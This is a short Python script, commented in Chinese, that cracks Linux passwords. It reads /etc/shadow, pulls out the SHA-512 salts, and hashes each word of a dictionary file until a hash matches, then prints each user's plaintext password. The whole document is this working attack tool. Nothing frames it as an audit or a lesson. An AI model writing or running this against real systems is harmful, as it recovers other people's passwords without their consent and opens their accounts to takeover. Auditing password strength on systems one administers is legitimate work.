#!/usr/local/bin/python3
import crypt
passwordfile = "/etc/shadow"
passwordlistfile = "/root/Desktop/wordlist.TXT"
def get_filelist(file):
"讀取文件內容並返回文件內容的行列表"
with open(file,'r') as f:
datalist = f.readlines()
return datalist
def get_userinfo(datalist):
list_user = [] #空列表理解一個容器 爲了保存具有用戶密碼的行信息
for userinfo in datalist:
"userinfo變量中是每一行的信息"
#print(userinfo)
userinfolist = userinfo.split(":")
#print(userinfolist)
saltpass = userinfolist[1] #篩選出來的密碼子段信息
if len(saltpass) > 3:
list_user.append(userinfo) #將帶有密碼內容的正行追加到一個空白列表中
return list_user
def pass_crypt(list_user,passwdlist): #有效用戶的列表 字典中所有密碼的列表
"密碼爆破"
for i in list_user:
username = i.split(":")[0] #取出用戶名
cryptpassword = i.split(':')[1] #取出加密的密碼
salt = "$6$"+cryptpassword.split("$")[2] #取出鹽值
for passwd in passwdlist: #對字典文件中每個密碼進行加密匹配
cryptpassword2 = crypt.crypt(passwd.strip(),salt)
if cryptpassword2 == cryptpassword:
print("用戶:%s,密碼是:%s" %(username,passwd)) #輸出用戶名密碼
break
datalist = get_filelist(passwordfile) #所有用戶信息列表
passwdlist = get_filelist(passwordlistfile) #字典文件中所有密碼的列表
#print(datalist)
list_user = get_userinfo(datalist) #有密碼的用戶列表
#print(list_user)
pass_crypt(list_user,passwdlist) #進行爆破